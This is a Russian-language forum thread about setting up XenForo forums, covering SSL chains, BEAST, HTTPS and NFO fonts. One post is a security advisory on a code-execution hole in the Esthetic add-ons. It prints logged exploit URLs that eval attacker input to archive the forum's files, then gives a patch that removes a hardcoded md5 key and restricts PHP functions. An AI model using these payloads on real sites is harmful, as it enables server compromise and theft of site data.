XenForo.Начало пути.

[Rufus]

Ща на работе...А где я мог накосячить с цепочкой?В панельке при установке было поле только для сертификата и ключа.Каких-то дополнительных настроек не было.Или я мог ошибиться при получении сертификата?

Понял свою ошибку.Я просто вставил содержимое сертификата,надо было так

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

З.Ы.Олег,а по другим проблемам которые отображены в твоей ссылке,я могу напрягать поддержку или они не будут заниматься подобным?
И вообще этот сервис показывает когда-нибудь идеальные результаты)?

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

 

[X-Shar]

Ну уязвимость Beast не страшно, т.к. она для старых браузеров, которыми мало кто пользуется, а во вторых хрен её проэксплуатируешь, вот условия для атаки:

1.Атакующий должен иметь возможность прослушивать сетевые соединения, инициированные браузером жертвы;
2.У атакующего должна быть возможность внедрить агент в браузер жертвы;
3.Агент должен иметь возможность отправлять произвольные (более-менее) HTTPS-запросы;

 

[Антоха]

Олег,фигня какая-то...Зашёл щас с фаерфокса на ксенлабс

Изменил цепочку сертификатов в правильном порядке,за что получил хорошую оценку твоего сервиса

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

Но лис так и не хочет принимать.Видно startssl ему не по душе.
Гугл советует отключить OCSP у лисы,но ведь это не вариант.На хабре тоже тёрли эту проблему.Через несколько дней она должна исчезнуть.

Спойлер

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

 

[Rufus]

Олег,что думаешь по поводу этой статьи и оригинала на Хабре

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

?
Использование HTTPS поможет уберечь своих пользователей от подобных ботов-аналитиков?

 

[X-Shar]

Использование HTTPS поможет уберечь своих пользователей от подобных ботов-аналитиков?

Нет, уберечь может только VPN, ну и что-бы там тоже не логгировалось ничего...

А SSL нужен для двух целей:

1)Скрыть от третьих лиц, в частнности и от провайдера тоже конфиденциальную инфу, т.е. логины, пароли, данные кредитки и т.д.;

2)Если перевести весь сайт на SSL, то код его будет полностью шифроваться, что исключит возможности вставки провайдером произвольного кода в ваш сайт, а это может-быть реклама например (Что уже не редкость кстати)...

 

[Антоха]

Решил апнуть эту тему;)
Нахожусь уже продолжительное время на форумах посвящённых тематике XenForo.И всё больше удивляет одержимость новичков в обвешивании своих форумов разного рода платёжными системами , баннерами с рекламой и хайдами.Ладно хер с ним,что форум кривой и на нём нет никакой инфы,но ведь ставят всё подряд,совершенно не заботясь о безопасности форума и его пользователей.Поэтому хочу вернуться к вопросу поднятому Олегом в этой теме,а именно про аддоны известного Виоделя (estheticlabs).
Его хайд и складчина пользуются ОГРОМНЕЙШЕЙ популярностью.Но никто не хочет задуматься об уязвимостях присутствующих в них.

Фикc аддонов esthetic от слива форума​

В аддонах Esthetic обнаружилась дырка позволяющая выполнить любой код и слить форум.
Форум сливается примерно такими запросами:

Скопировать в буфер обмена

    passthru() has been disabled for security reasons
    library/Esthetic/CS/Model/Thread.php(50) : runtime-created function(1) : eval()'d code:1
   
    Содержимое запроса
   
    array(3) {
      ["url"] => string(264) "http://вас сайт/бла/бла/?filter=$request=new+Zend_Controller_Request_Http();eval($request-%3EgetParam(%22query%22));&query=die(passthru(%27tar%20-cvvzf%20foo.tar.gz%20./library%27));"
      ["_GET"] => array(2) {
      ["filter"] => string(78) "$request=new Zend_Controller_Request_Http();eval($request->getParam("query"));"
      ["query"] => string(49) "die(passthru('tar -cvvzf foo.tar.gz ./library'));"
      }
      ["_POST"] => array(0) {
      }
    }

Скопировать в буфер обмена

    RecursiveDirectoryIterator::__construct(./cgi): failed to open dir: Permission denied
    library/Esthetic/CS/Model/Thread.php(50) : runtime-created function(1) : eval()'d code:1
   
    Содержимое запроса
   
    array(3) {
      ["url"] => string(601) "http://ваш сайт/threads/тут ссылка на складчину/?filter=$request=new+Zend_Controller_Request_Http();eval($request-%3EgetParam(%22query%22));&query=$zip=new%20ZipArchive;$zip-%3Eopen(%27backup.zip%27,ZipArchive::CREATE);$files=new%20RecursiveIteratorIterator(new%20RecursiveDirectoryIterator(%27./%27),RecursiveIteratorIterator::LEAVES_ONLY);foreach($files%20as%20$name=%3E$file){$filePath%20=%20$file-%3EgetRealPath();$zip-%3EaddFile($filePath);}$zip-%3Eclose();"
      ["_GET"] => array(2) {
        ["filter"] => string(78) "$request=new Zend_Controller_Request_Http();eval($request->getParam("query"));"
        ["query"] => string(283) "$zip=new ZipArchive;$zip->open('backups.rar',ZipArchive::CREATE);$files=new RecursiveIteratorIterator(new RecursiveDirectoryIterator('./'),RecursiveIteratorIterator::LEAVES_ONLY);foreach($files as $name=>$file){$filePath = $file->getRealPath();$zip->addFile($filePath);}$zip->close();"
      }
      ["_POST"] => array(0) {
      }
    }

Теперь перейдем к лечению дырок на примеру плагина хайда от конторы esthetic
Открываем файл: library/Esthetic/EBBC/ControllerPublic/Thread.php
Находим:

Скопировать в буфер обмена

case '54626eee0bcb90ab43c7917eb49f2344'

и удаляем вторую строку

Скопировать в буфер обмена

case 'a6746afee9fa4e6e4901943d47f272bf''

либо генерируем свой md5 код и вставлем вместо этих двух.Остальное плагины латаются по аналогии

Потом идем в файл php.ini который находится на вашем сервере,либо хостинге и ищем
строчку disable_functions и заменяем на:
disable_functions="popen,exec,system,passthru,proc_open,shell_exec

Взято с programmisty.net​

И ещё информация по теме:

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

Тэги:Esthetic Collaborative Shopping,Esthetic Simple Payments,Esthetic Extended BB-Codes,HIDE esthetic
.extended.bb-codes,скачать бесплатно

 

[X-Shar]

Форум сливается примерно такими запросами:

А это как понимаю пхп нужно залить на удалённый сервер и уже там выполнить код, или как ?

А вообще самая хорошая защита - Это не ставить плагины от личностей, которые зарекомендовали себа как троянщики, к тому-же это не первая уязвимость в его плагинах...

Что касается хайда - есть альтернативы, если говорить про совместные закупки - то за такую цену можно найти более-менее адекватного спеца, который напишит вам такой модуль...

Ну и можно ещё поставить Web Aplication Firewall он блокирует большинство похожих уязвимостей (Просто блокирует такие запросы), правда форум может глючить и не исключены ложные срабатывания...

Ещё можно перейти на SSL, тоже небольшая защита будет !

 

[Антоха]

Олег,хочу у тебя проконсультироваться...
На ксенфоро.вс у нас имеется одна француженка и она тут подняла вопрос,как создать bb-код для nfo.Привела пример такого же вопроса на офе

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

Я сначала думал,что это опечатка и нужно простое окошечко с info.Тот код с офа немного подредактировал и при вставке текста в тэги он появлялся в виде информационного окна.
Но впоследствии оказалось,что нужно выводить именно

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

.
Вот пример:


но после вставки у француженки отображается так

То есть символы нечитабельны.Проблемы с кодировкой?С отсутствием этих символов?
И ещё,некоторые nfo изображения редактор ломает сам по себе.Например,вот так выглядит оригинал:

а вот так он отображается после вставки в редактор

Жорик ничего посоветовать не смог.У тебя есть какие-нибудь версии?
Вот та

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

на вс.

 

[X-Shar]

То есть символы нечитабельны.Проблемы с кодировкой?С отсутствием этих символов?
И ещё,некоторые nfo изображения редактор ломает сам по себе.Например,вот так выглядит оригинал:

Попробуйте поиграть со шрифтами, на оффе этот:

face="Lucida Console ANSI, Terminal"

А у тебя:

face="Tahoma, Verdana"

Может нужен именно Terminal он как-раз ничго карёжить не будет...

 

[Антоха]

face="Tahoma, Verdana"

Я его потом поменял на Comic Sans,чтоб поприятнее выглядело.Ок.Попробуем сменить шрифт.